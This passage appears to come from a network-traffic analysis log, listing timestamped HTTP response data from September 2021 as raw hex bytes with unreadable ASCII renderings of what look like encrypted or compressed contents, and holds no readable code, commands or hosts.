c0 50 1a c5 1a 87 95 da 6d 2c 71 82 c4 c5 c9 29 ba c0 39 7a 8b f4 f0 e9 d2 e9 87 05 d8 6c 8f 61 fd 77 79 90 ab 88 dd c2 54 7b c7 ef ff 75 56 59 c2 95 fa e5 68 f1 ca
                                      Data Ascii: >Y,M$3vs`.t<pij/T!N`y_fQW}n4HLnJT*O'vs`YM],IbfrU9(!&SU1s,AMUPEg5))4e!s/}f")H,@N-X>XZ!Pm,q)9zlawyT{uVYh
                                      2021-09-27 11:24:29 UTC196INData Raw: 6b 26 ea 4e 0d 34 a2 d5 51 b7 f4 7b fa ad a9 47 ac d6 b5 7a 73 fd 54 da a0 c4 e5 46 41 06 ed 0b 98 73 8f de d0 3e 03 53 de 93 ff a4 ca 85 c9 0d 3e 15 8b 9d a1 d2 e6 e5 84 e1 47 20 0c 47 9c 3e fd 31 3d f2 89 33 55 26 6a ad 5c e7 7f d5 f1 7a 07 97 5f 09 1c b0 19 f1 e8 6a f1 1d 74 54 13 8d 65 7f a4 98 c1 d7 e7 68 23 82 ca f8 e9 80 29 d7 d3 5f 46 72 f6 1d 18 d9 6a ea 21 b6 85 aa 3c 38 be 5b 78 14 6c 21 42 21 da 0e a5 22 f8 32 28 e1 e1 79 37 c6 70 56 8e 29 19 91 85 4d ee 05 87 60 78 92 c8 54 31 f2 fa 77 fd 52 99 99 1d 14 b8 b5 ed f3 53 d7 0d 75 e1 bd 27 2e a0 14 6c 4c a8 af 15 17 81 dd 63 e4 1e 5f 90 5b 16 20 05 f5 59 40 f9 31 b7 05 f6 47 04 b7 86 ee ab c8 77 4e 75 36 64 03 e9 cd db a8 68 08 93 b7 4d 64 80 6f 79 7c a5 61 5f 15 8c 4c f4 df 82 67 65 02 73 f0 97
                                      Data Ascii: k&N4Q{GzsTFAs>S>G G>1=3U&j\z_jtTeh#)_Frj!<8[xl!B!"2(y7pV)M`xT1wRSu'.lLc_[ Y@1GwNu6dhMdoy|a_Lges
                                      2021-09-27 11:24:29 UTC198INData Raw: f3 b2 df 02 03 56 e7 f2 d2 bb 09 9c c0 19 5c 8b f5 c1 86 f7 e3 ea 05 fc 09 ed 71 98 7a 5e dd aa b8 ae c6 70 1e a1 e1 9e 7b 79 14 cf a5 89 c6 4b 94 89 fb 3b 44 d8 b1 45 7f 45 f9 56 a8 b5 24 44 30 e4 65 32 8c 4e 1c 15 ba 32 fa 47 4e 02 85 2e 20 74 2e 5a 7f a4 a3 a5 c1 d1 6e 49 b2 54 5e 15 3f 42 19 e1 43 e2 4d fa 69 35 fb ea bc 0b 41 16 29 7c 68 e0 82 5f 9a 44 97 d6 91 25 e2 cc 06 95 7a 58 d7 b1 31 98 a7 08 3c 1b 2e 8f 7c cd 51 c3 e1 2c b1 4c 5b c1 b6 9f 4e 51 da 7e 93 20 c2 ac 05 c0 a6 35 17 44 06 75 f9 2a e1 9c 69 cb 86 e4 1a 4e cf 4c 9f a6 2a 2e f7 07 6f 12 e9 f4 85 70 92 ca 27 fb 2e 2d e8 84 bc a6 be c2 3e 36 df e0 5b 11 aa 0c 50 ab b1 80 fc 8e 3c 56 e0 5e e8 c1 83 c6 68 e9 6d 47 a7 b2 b4 d3 44 42 38 9c a9 ae 88 f9 da f5 d0 69 6a d3 9a db 46 f8 95 73 ba
                                      Data Ascii: V\qz^p{yK;DEEV$D0e2N2GN. t.ZnIT^?BCMi5A)|h_D%zX1<.|Q,L[NQ~ 5Du*iNL*.op'.->6[P<V^hmGDB8ijFs
                                      2021-09-27 11:24:29 UTC199INData Raw: e8 65 65 ec 2c b9 6b e4 54 18 a6 e3 c3 be c0 76 45 76 28 60 60 da eb c0 8b 66 07 95 a0 50 4f 8f 59 79 0f 90 13 78 0b 9d 5f d7 fe 81 41 61 71 53 ed 96 34 ac 0e e5 4c 70 67 cf f4 f5 96 6f 83 fd 65 24 d1 40 19 7f c3 56 4b c0 5d 68 94 4a ba c3 a1 ee 76 2a 39 1e 8f d4 6c 24 6d 28 cf 79 3c 61 4a 63 c1 d7 8f 37 6a 0c 8a 74 81 2b 35 4f 53 a6 80 10 ec 61 3f 3d 98 18 c5 f8 55 e8 04 98 06 34 16 30 b6 b6 2d ac 0f f7 6e c7 f7 22 4c 76 70 4e ec 41 eb 61 7a 91 22 7b 7c 84 5c a5 3e 0d e3 d5 a0 0d 23 5e 9f 9b 02 aa dd d7 74 ad aa 9d 87 b3 46 05 1f 1d aa 2d e4 2c 71 3e a0 49 57 a4 10 c2 12 65 93 3c b6 9f ee 1b 4d 06 b6 36 ef 3b 98 53 72 92 1c 62 16 52 fb 4a 61 e2 e7 e0 57 bd 38 20 e7 3e 62 c2 ee 54 91 6d db 93 2c ae 2e 06 91 32 34 8f b5 ed 78 f7 f4 b4 80 0a 3f 87 8a 45 92
                                      Data Ascii: ee,kTvEv(``fPOYyx_AaqS4Lpgoe$@VK]hJv*9l$m(y<aJc7jt+5OSa?=U40-n"LvpNAaz"{|\>#^tF-,q>IWe<M6;SrbRJaW8 >bTm,.24x?E
                                      2021-09-27 11:24:29 UTC200INData Raw: 2e c8 89 67 03 c4 3c 56 b1 ba b8 ea 9f 3d 4d f5 42 e5 c3 81 c6 7d e9 75 72 b4 a8 a7 fa 51 49 0c 82 a3 c8 a2 e7 da c7 d0 7e 4b dc 93 bf 69 f2 f8 44 be 73 f6 64 d8 bf 60 b7 35 ec 64 78 c2 8c 24 a8 1a ad 74 59 69 4c 5a 03 f4 12 a7 25 c7 53 94 93 28 b5 4b fd a1 f8 a0 c5 81 ab f5 07 5e 08 ed 64 6c 07 93 bb 73 ef a0 52 f7 e1 81 71 cb 9e b9 15 5e ca 3a df f8 a3 e3 6a 1e 07 db 6a 9f 47 ea f4 e7 59 64 78 bb a5 f9 c1 e7 bd ab 25 02 59 a1 a3 a1 f3 da 91 9c f5 34 0f 55 05 95 67 be 3b 64 b6 82 6a 10 2a 33 eb 51 be 38 db a8 32 08 ce 3e 23 46 d2 32 ab a5 4f df 7e 59 0e 77 a3 3f 1a 8b c2 a7 f7 bd 0f 2a d8 ad ff c7 df 1a ec a0 48 6b 1d e1 23 50 de 43 82 46 af ea a0 29 39 95 48 51 19 6a 2c 1d 38 b6 08 b3 3e a7 09 28 f9 fc 1c 0f fc 04 4b aa 51 3f 93 f0 7d ee 67 ae 64 28 b5
                                      Data Ascii: .g<V=MB}urQI~KiDsd`5dx$tYiLZ%S(K^dlsRq^:jjGYdx%Y4Ug;dj*3Q82>#F2O~Yw?*Hk#PCF)9HQj,8>(KQ?}gd(
                                      2021-09-27 11:24:29 UTC201INData Raw: 3e ea 51 76 82 02 41 32 41 e0 49 79 96 e5 85 60 8d 05 31 fc 33 6a b0 cb 5c ff 6b c4 f2 3c a6 4a 20 80 32 19 af a3 fd 61 92 87 96 81 3c 12 b2 9b 5c e0 ba 0c a4 9b d6 3a cd 50 8c 11 0e 25 90 09 c9 06 87 d0 4b 81 c5 d3 75 5e c5 31 35 5b f1 e8 89 68 ce 49 b6 81 8f 30 b9 6b 23 e1 34 87 b1 f4 6d 08 5f 82 d3 ff a4 01 9c b4 0d 50 e8 f2 df 8e f5 d8 ee 10 f3 01 ed 6a 9c 67 52 d1 a3 ac b2 d5 7e 0f c9 c1 ff 5e 41 2b c3 bb fa f5 4d 9f ed d5 32 20 c3 93 59 61 50 8d 7a 8e a2 21 4f 2d f6 63 21 8d 0d 38 18 a7 3a fa 40 4e 66 8f 2e 56 5f 2b 3f 3a 88 c6 84 c6 bf 60 49 c4 73 5b 70 6b 6a 3e fa 69 e0 5e f2 75 5a dc f4 95 0c 41 34 24 6b 44 ef 84 5a 9e 2a de f1 91 50 ec c7 74 90 76 34 fe d4 16 dc a9 1e 38 2b 0e 8d 6c c4 51 ad a8 3c bb 4e 4b e6 a8 99 59 63 db 60 93 45 f8 c3 26 ca
                                      Data Ascii: >QvA2AIy`13j\k<J 2a<\:P%Ku^15[hI0k#4m_PjgR~^A+M2 YaPz!O-c!8:@Nf.V_+?:`Is[pkj>i^uZA4$kDZ*Ptv48+lQ<NKYc`E&
                                      2021-09-27 11:24:29 UTC203INData Raw: b0 4e 68 1b fc 29 18 fa 5e 9c 2f 9e ea a3 59 1f 95 5f 70 16 7e 07 72 13 aa 1c b2 3f d4 2b 27 8d c6 69 06 99 17 71 9b 76 19 84 f7 65 c4 60 bb 45 17 a3 c7 54 11 f6 8e 60 cf 3a 91 9e 69 3d bc cc ca fd 24 dd 6c 12 e1 a8 78 09 ad 60 40 48 d1 83 1b 60 88 b8 44 d4 39 55 81 4e 45 3b 15 f5 62 6b ef 2b d6 47 c9 35 28 ac e3 c9 b0 ad 56 65 14 04 6a 03 e9 c7 af af 65 62 b5 bb 54 50 80 69 7d 28 9a 13 73 10 99 56 d4 f4 e3 72 6b 02 41 ed f8 24 a6 0e c6 46 04 50 c5 87 e2 9c 75 af d1 0b 01 d2 2f 23 77 a2 75 47 f0 42 63 82 4c f3 f9 b5 f8 26 0d 22 08 86 b0 77 2f 7d 22 bd 4c 30 0d 6c 58 ca d0 94 52 29 34 93 6c 80 30 33 67 4e b4 ab 75 c6 6d 34 39 ba 18 b7 cc 59 f3 21 b4 11 30 16 51 83 b7 0a 8e 0b f1 78 ae dd 28 6c 6c 79 53 ae 60 e1 64 60 91 2c 7e 63 b6 5c ad 25 06 aa ff a3 0e
                                      Data Ascii: Nh)^/Y_p~r?+'iqve`ET`:i=$lx`@H`D9UNE;bk+G5(VejebTPi}(sVrkA$FPu/#wuGBcL&"w/}"L0lXR)4l03gNum49Y!0Qx(llyS`d`,~c\%
                                      2021-09-27 11:24:29 UTC204INData Raw: 48 4d 73 e4 81 47 9a 14 ac fc 95 35 ec dd 31 86 6a 5b c0 b1 3b b0 ab 1a 3e 24 2f 81 74 c4 57 b7 ed 0d a6 51 40 a0 89 93 40 60 ca 7d 9c 45 f5 b7 04 dd a1 38 09 21 55 7d ff 35 db a0 4d d7 90 e7 0d 4e fa 5c 85 8d 0d 36 ff 23 63 05 c1 f5 ae 78 91 cf 27 cd 4b 0e e8 90 b8 9a b0 de 5a 13 ff 8e 7c 09 a1 0a 58 b2 bb a6 85 b3 38 70 e0 57 e9 c0 83 a8 4e c3 63 48 a3 a2 a5 de 4b 59 31 95 be cf bf e4 cd 94 e3 69 56 f7 9a ca 47 f8 e7 55 ab 6e e1 37 ed ae 7d b0 24 8d 44 78 e3 f8 78 a2 00 a5 06 1e 22 5b 6a 03 e9 09 c9 0f a8 6e 88 85 34 b3 39 d7 bd fa c1 e2 9d 9c e4 01 41 5f d9 62 62 02 fa 96 66 8a 95 49 c7 e8 80 7c de e7 9d 0e 7d d7 54 ea 9d a5 e2 57 2f 16 e5 7f 8f 2b c6 d6 db 4a 16 0b 93 b8 c2 f7 fd b1 bd 1a 13 67 ce a3 c4 e0 e0 ad ac cd 35 68 17 34 fd 24 8e 53 20 81 ea
                                      Data Ascii: HMsG51j[;>$/tWQ@@`}E8!U}5MN\6#cx'KZ|X8pWNcHKY1iVGUn7}$Dxx"[jn49A_bbfI|}TW/+Jg5h4$S
                                      2021-09-27 11:24:29 UTC205INData Raw: 96 10 e7 61 20 13 9c 09 ac d0 5e ef 4f 9a 1a 22 26 16 b6 bd 0b a8 1d 83 6c a2 c6 19 66 6a 7e 4e dd 33 c3 73 7d b3 28 76 6b a4 28 83 2f 1c aa fc a4 06 23 6f 94 f8 0a ab cc fa 44 cc 97 b3 86 ae 57 0d 31 1d ab 32 e4 3f 66 6d 86 5d 4d b9 1a ee 03 59 84 39 a4 8f e8 0d 4d 32 87 03 e4 32 8e 40 72 98 3e 73 06 70 f3 5a 75 fb e7 94 71 a0 26 50 fd 37 73 ef c8 55 89 69 c7 91 3d af 1a 26 97 27 2b 83 a3 fd 7e e1 f4 b6 9b 00 34 a2 9b 43 b0 8d 1f b0 9a c7 09 cd 56 b6 65 24 38 f5 1c cd 06 b7 e4 51 ed ed e1 62 4c d6 31 35 3e d0 ec af 76 ce 4e ac ef ab 0c ae 7c 3e f0 30 e8 b9 f8 01 2c 5d ef f0 e7 bb 09 b6 a2 15 5c e8 c7 ff 8c e9 d9 87 22 f2 00 88 63 9e 77 5f e3 bc cb ba c2 63 24 f2 d9 9c 71 70 2a d9 d6 bd c2 58 b2 fc c8 2d 45 e4 a4 7b 6a 4f 9a 70 a9 a3 40 68 0e d1 68 37 92
                                      Data Ascii: a ^O"&lfj~N3s}(vk(/#oDW12?fm]MY9M22@r>spZuq&P7sUi=&'+~4CVe$8QbL15>vN|>0,]\"cw_c$qp*X-E{jOp@hh7
                                      2021-09-27 11:24:29 UTC207INData Raw: 25 5e ca 37 d9 94 81 e8 7a 11 0d dc 65 89 2b e8 dd fc 61 27 64 ab bf d2 a4 ee b9 bd 16 33 7c ad af e2 fb ca 8b b7 b8 00 0d 21 04 95 06 8f 10 0b 87 84 1e 55 07 5d c9 78 dd 1c d6 d8 0e 60 8c 3a 2c 2f de 1b c8 8b 4b db 69 31 4c 50 b9 46 0f 97 86 a4 fc cf 11 32 ac ca d8 f0 f2 33 fd a7 7e 72 11 e1 3e 68 cb 30 be 2e 9e e0 ac 3d 1f 95 4c 6b 0c 19 07 72 10 ac 18 b2 22 a7 23 2c f9 cb 4c 07 eb 04 14 9c 4c 2e af d5 66 fd 71 c2 66 1d a0 f6 1d 18 e7 9f 4d f2 33 94 ab 78 04 af d0 fc c2 3c c1 18 75 f7 b9 53 17 88 7a 7f 48 da a9 15 7b b5 dd 65 cd 3f 4c b4 55 64 27 60 d2 69 76 ec 45 b1 60 d2 6a 1b ac 91 f9 df de 76 7e 4b 32 6a 71 da a8 e9 93 7a 35 93 b6 6b 45 90 6e 7d 0f 81 13 78 0b 9d 5f d7 fe 81 41 61 73 56 e7 8b 33 c9 56 cf 45 4a 5a ce e2 c9 90 72 84 98 02 02 c9 70 22
                                      Data Ascii: %^7ze+a'd3|!U]x`:,/Ki1LPF23~r>h0.=Lkr"#,LL.fqfM3x<uSzH{e?LUd'`ivE`jv~K2jqz5kEn}x_AasV3VEJZrp"
                                      2021-09-27 11:24:29 UTC208INData Raw: fb c6 ca 01 f6 03 9f 5b fd 57 48 f5 ae bf b8 e3 7e 09 c4 cf 8b 7d 67 20 aa b1 9f d3 73 a3 ec dd 36 53 fe a2 52 18 47 9c 61 85 93 21 51 3f f3 65 27 99 0d 2c 03 b3 3b 93 76 59 66 a3 30 09 5e 34 4a 1e 8a af b6 d1 bf 48 57 9b 72 5b 15 4e 70 1d f9 6f f8 42 93 7c 3f e1 d8 a9 17 5c 2f 3a 67 75 f8 e0 40 9a 30 81 e3 8d 39 e0 db 1d 80 61 34 e1 c8 0b a8 ab 16 62 27 38 8d 6b d3 5d b7 d1 7f 9d 4d 7c d5 b6 9a 7b 42 fd 7f 86 54 ef c3 03 ec a1 2e 0b 55 41 77 e8 0e cc bb 78 c0 90 fc 06 4e df 7a 83 ab 33 37 c1 24 72 27 f7 ff bd 74 8e da 32 9e 5d 1b fd bd 89 9c b0 d4 23 5a f3 b7 6c 06 94 0a 56 be ad d4 c6 92 30 6e e3 5f ed df 82 96 48 e3 79 5b c6 87 b8 f7 40 7f 25 83 b8 cb a6 db cd fb dc 75 22 f5 91 cb 7a ef fa 4c a6 01 c1 52 cb a4 7a ad 20 95 60 65 fe 80 2f c1 36 b0 74 5d
                                      Data Ascii: [WH~}g s6SRGa!Q?e',;vYf0^4JHWr[NpoB|?\/:gu@09a4b'8k]M|{BT.UAwxNz37$r't2]#ZlV0n_Hy[@%u"zLRz `e/6t]
                                      2021-09-27 11:24:29 UTC209INData Raw: 0d 06 8e a8 bd 67 db 67 d6 d4 2b a0 34 1d 38 7d f4 01 b0 aa fa 28 88 89 63 de 16 82 f2 90 78 92 d4 0b b0 a9 f5 3d b6 8f 86 d9 01 fa 92 45 64 bc 21 7b 9a 36 03 a2 4a 29 07 e6 27 a6 90 f3 94 2e 56 4e 65 e2 d3 1e 42 1a 50 b8 02 51 64 09 13 a5 b8 f5 57 6d 43 ed 45 fd 47 56 2f 32 b7 ca 66 87 0d 56 4e 6d 7c cb ad b1 99 41 f3 71 44 f8 58 d6 53 6f dd 4e 83 19 46 bf 43 05 02 0d bd bf 36 a4 16 1b 71 55 13 39 d6 34 ca 49 48 e3 93 c6 41 46 21 fe 9b 64 c2 b5 8c 37 cd c9 c7 f0 da 30 6d 12 41 c6 5f 80 43 18 68 d4 29 2d dc 5b 8c 61 16 e9 5b c9 f8 ff 6c 28 47 8b 7f a6 41 8f 32 13 f6 4f 73 64 20 93 35 06 f3 8c eb 13 d6 48 42 0f 77 15 31 8c 39 f7 0d 89 f2 49 4a 63 4e e5 44 44 f7 56 b1 1d 13 dd f5 f5 63 46 d4 7f 14 e8 ec 6c c3 76 87 6f 29 09 c1 62 69 46 9e 68 ac 70 c5 98 2c
                                      Data Ascii: gg+48}(cx=Ed!{6J)'.VNeBPQdWmCEGV/2fVNm|AqDXSoNFC6qU94IHAF!d70mA_Ch)-[a[l(GA2Osd 5HBw19IJcNDDVcFlvo)biFhp,
                                      2021-09-27 11:24:29 UTC210INData Raw: 05 78 d5 ab 48 73 b3 fb 2c 9c 5a fe f8 1e 74 c5 a9 8c 95 46 a1 ed e0 85 c2 27 59 d1 15 0a 38 ba 46 f9 16 f8 b8 02 a9 db b3 e5 24 16 d3 c0 86 45 0a 8d 57 57 9c a7 20 79 42 a7 8e d1 a3 11 04 1a 5e 10 11 2f 31 ae e9 04 70 77 49 2c 32 60 82 19 6e 74 53 3e 6a fb ae c4 98 ed 1d 06 10 4a 90 91 55 a0 1c cb 3b 6d 27 c3 95 ec eb 68 e2 f1 77 0e af 46 78 73 d1 7b 30 da 23 09 e9 21 b4 99 dd 85 4f 59 22 7f 83 c6 57 53 72 5f d4 18 30 73 60 03 cd a4 92 40 03 53 96 0a 9c 50 3f 3c 49 c0 ad 67 e9 16 31 4e 85 6f ac ad 59 8e 26 ef 16 44 10 43 ad c0 17 ca 07 91 8a 87 a0 2f 37 6b 0d 61 bc b2 25 0b 07 e5 51 96 bc d6 3a 45 0a 79 62 a8 cd 74 54 ab 63 9a 77 4e e9 8e 37 cd ca db 74 73 34 75 0d c8 5b 5e 8f 40 00 7f 55 b1 22 d8 61 02 22 12 ef 5b d6 e2 8f 6c cc 11 e1 79 b5 51 e3 16 10
                                      Data Ascii: xHs,ZtF'Y8F$EWW yB^/1pwI,2`ntS>jJU;m'hwFxs{0#!OY"WSr_0s`@SP?<Ig1NoY&DC/7ka%Q:EybtTcwN7ts4u[^@U"a"[lyQ
                                      2021-09-27 11:24:29 UTC211INData Raw: c6 53 2d c6 4a 7e 2f 1b 17 8e dc b3 c6 8a a8 ff 8d 62 4b 80 3c ec d7 4d 4d 8f 44 14 f5 98 8d c8 0c f9 b3 4e 8c ac 6b 94 e7 d7 fc b6 ab 7a 58 bb f3 09 77 c5 75 39 c4 c1 c6 07 f7 5b 10 8f 2d 89 b0 e3 cf 3d 89 1c 27 cc dc d4 93 2d 2a 5c f2 c6 b3 ce 83 b3 94 a1 0d 30 30 f1 b5 38 1f 90 3e d5 07 93 36 b1 c8 14 dc 4e eb 20 0b 8d ea d6 55 68 d6 68 0f 8d 11 14 72 9a 66 cc 5f db 1d fd ec 59 dd 24 88 c7 99 a0 97 e9 59 b8 6c 35 26 a8 04 8d e4 f4 df 14 ec f6 20 a7 a5 fe 0e 2c 02 fc 7a 1a ad 44 b6 e8 ca 8e 0e 49 72 bd 1b f5 3b 81 b0 83 39 6c 05 d6 c3 cf aa 87 d4 c1 47 6e 12 cb d6 21 4d b1 ed cb b0 42 68 54 55 94 6f fa 54 67 fc f7 64 48 4c 39 ad 3d a3 71 bd a6 72 71 4c 12 46 41 b8 54 b7 f5 32 b6 01 2c 0c 1b c3 37 7a e3 c0 dd 91 b3 61 45 dc c4 87 bd 92 23 90 d0 3e 3c 72
                                      Data Ascii: S-J~/bK<MMDNkzXwu9[-='-*\008>6N Uhhrf_Y$Yl5& ,zDIr;9lGn!MBhTUoTgdHL9=qrqLFAT2,7zaE#><r
                                      2021-09-27 11:24:29 UTC212INData Raw: 84 d7 e0 df 2b f4 8e 77 4e 30 89 25 4d 84 c4 fb d4 20 e0 bf 47 d0 36 89 50 10 7f 55 68 31 a4 7b 9e 68 19 eb 55 d7 fb 18 b7 51 44 60 ba a7 56 ca 36 01 76 cc 1b 62 23 87 3a 95 0f 83 f2 95 92 5b 5e 80 5e 6b b0 c6 31 98 08 c0 f2 36 cb 39 47 f7 41 4e e8 ca 9d 11 97 e8 e1 77 d6 46 c3 ec 58 f2 6d cc d6 d7 a0 7c a6 35 47 b4 60 48 93 73 a9 6f dd 8b 27 fc 22 59 1f 2a b8 5a 45 5e a3 9d f1 1f b3 20 da fd 68 df d2 71 4a 81 5e 87 d5 97 70 6a 2f 87 93 81 cf 79 eb 41 e6 38 85 a6 a1 68 03 ab 89 6a 93 71 e3 2a f4 14 3b 85 dd 4a 44 a6 19 75 21 2c d4 12 38 59 9a d6 cb a7 1e f1 ba ba 6b 20 bf d0 1d 18 17 f9 2d da e9 40 60 5e d2 0c 10 e0 49 7d 33 d2 11 fa 45 20 2e cc 09 56 51 45 74 7f aa c6 8f a8 f1 27 68 c4 6b 35 21 3f 57 7c c6 06 d8 3b c6 1b 0c 95 d0 d9 3d 35 19 48 54 01 e0
                                      Data Ascii: +wN0%M G6PUh1{hUQD`V6vb#:[^^k169GANwFXm|5G`Hso'"Y*ZE^ hqJ^pj/yA8hjq*;JDu!,8Yk -@`^I}3E .VQEt'hk5!?W|;=5HT
                                      2021-09-27 11:24:29 UTC214INData Raw: 76 73 4b 62 5d 49 33 ab 37 b0 71 bd a0 72 71 4c 12 43 46 b3 52 a5 e6 3f 29 50 37 0e 10 c5 31 77 eb c6 c1 9e be 60 46 d8 cb 94 b0 88 4a 89 d2 2b 12 7a 9b 49 10 b8 36 e2 48 e2 8d c5 51 5b e6 26 0c 6a 98 dd 1c 70 c7 73 dd 58 a9 4a 54 83 9c 01 66 91 6d 1a e7 2d 5a f0 98 07 a8 02 c9 14 6a 55 30 55 64 12 ba 2a 8e d3 61 f9 0f f7 99 bb 9c 11 42 a1 ef 60 96 5f 3e 5a 40 54 19 44 a0 da 7a 05 67 19 12 9b 5a 2c 67 2f 10 73 61 93 85 1d 90 43 f6 04 b4 b6 76 cd ca 8a d0 b8 01 8b 8d 43 17 82 ee bd bd 66 93 63 e4 55 79 32 8c 06 16 6e 9c 1d 22 12 f4 2a 9d 9e ed 01 85 42 2d 90 91 4f d4 00 ab 39 05 37 ab 97 98 e7 01 f8 9b 6f 66 b8 23 6d 12 cd 1c 2c ae 23 09 ef 32 b4 9f d9 90 20 56 45 63 e4 dc 23 4f 13 6f ba 01 4c 73 88 88 a5 a4 7a 12 7f 53 7e 81 f4 50 d7 6e 3d dc ca 69 8e 16
                                      Data Ascii: vsKb]I37qrqLCFR?)P71w`FJ+zI6HQ[&jpsXJTfm-ZjU0Ud*aB`_>Z@TDzgZ,g/saCvCfcUy2n"*B-O97of#m,#2 VEc#OoLszS~Pn=i
                                      2021-09-27 11:24:29 UTC215INData Raw: 4c 41 84 03 68 64 53 ce fb 10 a1 26 c2 4e 44 9a 05 31 6a f7 44 73 aa b1 32 35 46 32 37 7e 31 10 6d 17 b7 8e 35 9d 12 5d 90 89 cb e4 a8 48 40 06 07 a1 e1 21 7e d9 dd 99 f8 56 87 b4 71 e9 1d 3a ba b9 7e dc cc 7d 51 71 55 a7 19 b6 21 d1 29 e6 d5 2c b3 e0 cf e4 b5 a9 b9 00 77 60 83 d1 c0 36 d2 42 69 a0 42 11 92 50 b0 c1 1a 24 7b 89 6a 5c 1c 7d f2 dc 4d 4d 9a 5c 03 6b 97 fd d1 03 7d ee 43 83 20 62 87 fe c4 eb c3 be db 1a b2 e8 01 79 ca 65 25 cb c1 c6 04 67 58 0b 93 b1 c8 ae e8 c8 34 84 14 30 47 85 d2 95 2b 22 4f f7 c5 bc 49 be b1 86 27 31 3f b7 e9 ba 37 98 9d 29 da 09 99 17 a9 c5 14 dc 5a e4 2d 12 99 f0 51 c5 7a d8 0d 10 1e 51 0f 77 87 69 b0 5f c2 08 e1 f3 49 b8 25 86 4c da ae 91 fd c6 81 70 b2 13 bb 95 40 62 93 cb 14 e9 d4 3c a3 bf 6d 4e aa be ec 66 00 25 81
                                      Data Ascii: LAhdS&ND1jDs25F27~1m5]H@!~Vq:~}QqU!),w`6BiBP${j\}MM\k}C bye%gX40G+"OI'1?7)Z-QzQwi_I%Lp@b<mNf%
                                      2021-09-27 11:24:29 UTC216INData Raw: 3e ae 6c 1a c2 19 33 30 ac 01 e7 2e b2 86 50 16 2d 4b 49 7f 68 d1 2c c3 1e 5f 3f 0f 5d 7c 18 91 08 b2 fb 53 61 5d f9 18 f4 45 47 ad a1 cb c3 61 82 0f 44 54 e4 60 d4 3f 94 94 53 f7 63 5c 73 4d cc d5 79 d0 66 8b 03 c3 af 57 a5 aa 1b 21 bf b3 20 12 09 f1 4e 1c 1d f7 29 c6 41 7c e4 9c d8 7d 4e 28 f2 93 79 c7 b4 8b 3f d1 d8 d7 e9 c7 30 68 18 4e c7 57 8f 45 1d 65 d1 08 21 c3 7b 8d 6c 16 e7 49 c9 e4 87 70 45 5d ea 7e bc 50 f7 33 0e f3 4f 96 93 0a 95 3f 01 84 03 79 15 c0 d4 10 96 5c 1b a2 c4 39 f1 15 ac e0 d9 8b 42 55 88 54 c6 52 d9 85 09 9a fc e1 9c 6b 46 c8 f6 39 e8 e4 68 f1 f5 a3 65 aa 2f c5 60 63 50 9e 66 a4 62 ca 16 96 e4 80 82 0d 3c 32 c5 49 d8 2b 94 ed 1a ac 3d df ef e9 63 c0 18 57 84 55 86 d7 9a 6d 6f 32 80 80 86 c9 6c f9 ce 7f 3f 83 a1 33 5d 94 a2 97 6c
                                      Data Ascii: >l30.P-KIh,_?]|Sa]EGaDT`?Sc\sMyfW! N)A|}N(y?0hNWEe!{lIpE]~P3O?y\9BUTRkF9he/`cPfb<2I+=cWUmo2l?3]l
                                      2021-09-27 11:24:29 UTC217INData Raw: ca 61 0c 8d a1 08 65 06 97 c5 45 c0 02 ef f3 47 dc 25 89 d3 82 a2 91 f8 da 80 6c 22 a7 90 11 2d 72 f8 c7 94 03 fa 34 82 af ec 0d 2c 72 ff fa c7 a9 53 be e5 c1 8c 1c 53 e2 60 16 f8 23 88 98 8a 34 6e 1a 5d 00 ac 84 8a dd db c9 b2 04 4d 1d a3 91 bf e7 c9 b2 4d 6f 52 44 ff 65 ef d2 51 fb ca 68 57 50 b3 41 29 a3 7a a8 af 7d 75 dc de d2 47 a2 da 47 ea 20 a5 0f b1 ea 01 4b d3 6a f2 43 64 9e af e8 ae d0 df 8b 32 25 4b 9f 53 d7 13 72 91 45 08 ad b0 0e 53 fe 04 54 58 5e 61 c1 11 7f 1c 59 18 79 dd 74 c8 52 87 45 40 84 9a 1b 6f 84 75 06 6e 5c 47 f5 82 03 92 00 ca 04 78 d5 b4 51 71 96 fa 3e 81 57 f1 fe 3d 77 d8 a7 0e 7e 5c b4 6b 68 81 c1 22 5a 40 61 16 28 af da 71 1f e2 bf 15 b2 52 3a c4 3b 1f 59 6b 86 03 0e 85 40 c4 84 d3 28 6e cb e6 8d de b0 16 00 11 62 07 02 a4 a2
                                      Data Ascii: aeEG%l"-r4,rSS`#4n]MMoRDeQhWPA)z}uGG KjCd2%KSrESTX^aYytRE@oun\GxQq>W=w~\kh"Z@a(qR:;Yk@(nb
                                      2021-09-27 11:24:29 UTC219INData Raw: dd 94 32 ea a8 9c 11 28 ac 48 45 47 a3 84 f1 06 b2 38 d7 eb ee 71 44 19 52 84 59 95 53 98 6b 68 30 9f 85 94 a0 66 d9 c3 62 3c 96 b6 ae ec 87 af 8d 63 9d 71 e8 3f f8 1a 32 98 c7 c1 dd a4 12 75 b0 28 fa 00 91 50 a1 d1 fc a9 3e 70 14 bf 57 3d 8f d8 23 1f 23 e4 10 c7 d5 52 48 56 97 0f 4e e5 1f f9 7b da 5f fd 01 3d 63 de c2 47 13 5c 38 73 fb c3 df ad a2 22 3a c1 26 30 6d 3a 18 79 88 03 91 3e 8e 1e 52 87 ee d5 65 31 5d 4d 13 04 9c e5 2e fa 59 db 81 f8 57 92 ac 69 f1 05 31 af b4 6a 5d de 69 c8 65 4f 87 10 a1 31 de ad 62 d1 23 37 bd df eb 31 2d bd 47 f1 06 8b c6 5c aa ce 52 67 33 87 12 81 5b a3 d1 14 b7 62 28 6d ce 3d 2b 70 da 5f 5f 8e 5d 1a 6b 99 82 a4 03 7d ae 59 1e d2 62 9b 63 d1 f3 da be db 52 a8 61 01 6a d9 7d 25 d4 bd c9 99 e3 45 03 9d 2d 90 b0 fa db 26 91
                                      Data Ascii: 2(HEG8qDRYSkh0fb<cq?2u(P>pW=##RHVN{_=cG\8s":&0m:y>Re1]M.YWi1j]ieO1b#71-G\Rg3[b(m=+p__]k}YbcRaj}%E-&
